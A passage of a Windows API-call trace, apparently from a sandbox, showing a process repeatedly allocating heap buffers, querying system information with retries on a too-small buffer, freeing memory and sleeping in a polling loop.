ResultLength=0x19ee88 | out: SystemInformation=0x285ab58, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.432] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285ab58 | out: hHeap=0x2560000) returned 1 [0248.432] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bcc8 [0248.432] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bcc8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bcc8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.432] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bcc8 | out: hHeap=0x2560000) returned 1 [0248.432] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0248.432] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.433] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0248.433] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.433] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.433] Sleep (dwMilliseconds=0x110) [0248.450] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0248.450] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.451] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0248.451] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa88 [0248.451] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa88, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa88, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.451] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa88 | out: hHeap=0x2560000) returned 1 [0248.451] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b6d8 [0248.451] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b6d8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b6d8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.452] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b6d8 | out: hHeap=0x2560000) returned 1 [0248.452] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0248.452] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.453] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0248.453] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.453] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.453] Sleep (dwMilliseconds=0x110) [0248.470] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0248.470] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.470] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0248.470] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0248.471] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.472] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0248.472] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c188 [0248.472] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c188, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c188, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.472] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c188 | out: hHeap=0x2560000) returned 1 [0248.472] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cb58 [0248.472] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cb58, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cb58, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.473] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cb58 | out: hHeap=0x2560000) returned 1 [0248.473] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.474] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.474] Sleep (dwMilliseconds=0x110) [0248.484] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0248.484] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.484] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0248.485] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0248.485] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.485] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0248.485] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b938 [0248.485] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b938, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b938, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.486] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b938 | out: hHeap=0x2560000) returned 1 [0248.486] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c9c8 [0248.486] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c9c8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c9c8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.486] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c9c8 | out: hHeap=0x2560000) returned 1 [0248.486] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.487] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.487] Sleep (dwMilliseconds=0x110) [0248.498] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0248.498] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.499] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0248.499] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a678 [0248.499] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a678, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a678, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.499] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a678 | out: hHeap=0x2560000) returned 1 [0248.499] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0248.499] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.500] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0248.500] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d3f0 [0248.500] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d3f0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d3f0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.501] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d3f0 | out: hHeap=0x2560000) returned 1 [0248.501] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.501] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.501] Sleep (dwMilliseconds=0x110) [0248.515] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d868 [0248.515] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d868, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d868, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.516] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d868 | out: hHeap=0x2560000) returned 1 [0248.516] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0248.516] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.517] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0248.517] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c2b8 [0248.517] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c2b8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c2b8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.518] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c2b8 | out: hHeap=0x2560000) returned 1 [0248.518] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c838 [0248.518] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c838, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c838, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c838 | out: hHeap=0x2560000) returned 1 [0248.519] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.519] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.519] Sleep (dwMilliseconds=0x110) [0248.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d7f8 [0248.533] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d7f8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d7f8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.533] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d7f8 | out: hHeap=0x2560000) returned 1 [0248.533] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a818 [0248.533] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a818, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a818, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.534] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a818 | out: hHeap=0x2560000) returned 1 [0248.534] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b9d0 [0248.534] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b9d0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b9d0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.534] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b9d0 | out: hHeap=0x2560000) returned 1 [0248.534] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0248.535] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.535] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0248.535] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.535] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.535] Sleep (dwMilliseconds=0x110) [0248.545] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0248.545] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.546] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0248.546] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aa20 [0248.546] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aa20, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aa20, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.547] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aa20 | out: hHeap=0x2560000) returned 1 [0248.547] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bfc0 [0248.547] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bfc0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bfc0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.547] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bfc0 | out: hHeap=0x2560000) returned 1 [0248.548] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295c6a8 [0248.548] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c6a8, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295c6a8, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.548] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c6a8 | out: hHeap=0x2560000) returned 1 [0248.548] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.549] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.549] Sleep (dwMilliseconds=0x110) [0248.562] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6a8 [0248.562] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6a8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6a8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.562] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6a8 | out: hHeap=0x2560000) returned 1 [0248.562] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a8e8 [0248.562] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a8e8, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a8e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.562] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a8e8 | out: hHeap=0x2560000) returned 1 [0248.563] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295ba68 [0248.563] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ba68, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295ba68, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.563] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ba68 | out: hHeap=0x2560000) returned 1 [0248.563] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0248.563] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.564] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0248.564] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.564] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.564] Sleep (dwMilliseconds=0x110) [0248.582] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0248.582] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.583] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0248.583] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0248.583] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.583] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0248.583] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c0f0 [0248.583] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c0f0, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c0f0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.584] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c0f0 | out: hHeap=0x2560000) returned 1 [0248.584] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295ca90 [0248.584] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295ca90, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295ca90, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.584] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295ca90 | out: hHeap=0x2560000) returned 1 [0248.585] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.585] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.585] Sleep (dwMilliseconds=0x110) [0248.592] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d788 [0248.592] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d788, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d788, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.593] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d788 | out: hHeap=0x2560000) returned 1 [0248.593] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285aaf0 [0248.593] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285aaf0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285aaf0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.593] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285aaf0 | out: hHeap=0x2560000) returned 1 [0248.594] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0248.594] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.594] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0248.594] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d198 [0248.594] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d198, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d198, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.595] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d198 | out: hHeap=0x2560000) returned 1 [0248.595] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.595] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.595] Sleep (dwMilliseconds=0x110) [0248.608] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d6e0 [0248.608] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d6e0, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d6e0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.609] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d6e0 | out: hHeap=0x2560000) returned 1 [0248.609] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a950 [0248.609] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a950, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a950, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.610] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a950 | out: hHeap=0x2560000) returned 1 [0248.610] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295bb00 [0248.610] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295bb00, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295bb00, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.610] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295bb00 | out: hHeap=0x2560000) returned 1 [0248.611] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cc20 [0248.611] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cc20, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cc20, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.612] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cc20 | out: hHeap=0x2560000) returned 1 [0248.612] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.612] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.612] Sleep (dwMilliseconds=0x110) [0248.624] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d5c8 [0248.624] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d5c8, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d5c8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.625] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d5c8 | out: hHeap=0x2560000) returned 1 [0248.625] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a7b0 [0248.625] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a7b0, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a7b0, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.625] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a7b0 | out: hHeap=0x2560000) returned 1 [0248.625] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295b640 [0248.625] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295b640, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295b640, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.626] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295b640 | out: hHeap=0x2560000) returned 1 [0248.626] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295d260 [0248.626] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d260, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295d260, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.627] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d260 | out: hHeap=0x2560000) returned 1 [0248.627] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.627] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.627] Sleep (dwMilliseconds=0x110) [0248.638] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d750 [0248.638] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d750, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d750, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.638] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d750 | out: hHeap=0x2560000) returned 1 [0248.638] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x60) returned 0x285a540 [0248.638] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x285a540, Length=0x60, ResultLength=0x19ee88 | out: SystemInformation=0x285a540, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.639] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x285a540 | out: hHeap=0x2560000) returned 1 [0248.639] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x90) returned 0x295c3e8 [0248.639] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295c3e8, Length=0x90, ResultLength=0x19ee88 | out: SystemInformation=0x295c3e8, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.640] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295c3e8 | out: hHeap=0x2560000) returned 1 [0248.640] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0xc0) returned 0x295cdb0 [0248.640] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295cdb0, Length=0xc0, ResultLength=0x19ee88 | out: SystemInformation=0x295cdb0, ResultLength=0x19ee88*=0xc0) returned 0x0 [0248.640] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295cdb0 | out: hHeap=0x2560000) returned 1 [0248.640] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x1000) returned 0x295d900 [0248.641] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d900 | out: hHeap=0x2560000) returned 1 [0248.644] Sleep (dwMilliseconds=0x110) [0248.654] RtlAllocateHeap (HeapHandle=0x2560000, Flags=0x0, Size=0x30) returned 0x295d638 [0248.654] NtQuerySystemInformation (in: SystemInformationClass=0x8, SystemInformation=0x295d638, Length=0x30, ResultLength=0x19ee88 | out: SystemInformation=0x295d638, ResultLength=0x19ee88*=0xc0) returned 0xc0000004 [0248.655] HeapFree (in: hHeap=0x2560000, dwFlags=0x0, lpMem=0x295d638 | out: hHeap=0x2560000) returned 1 [0248.655] 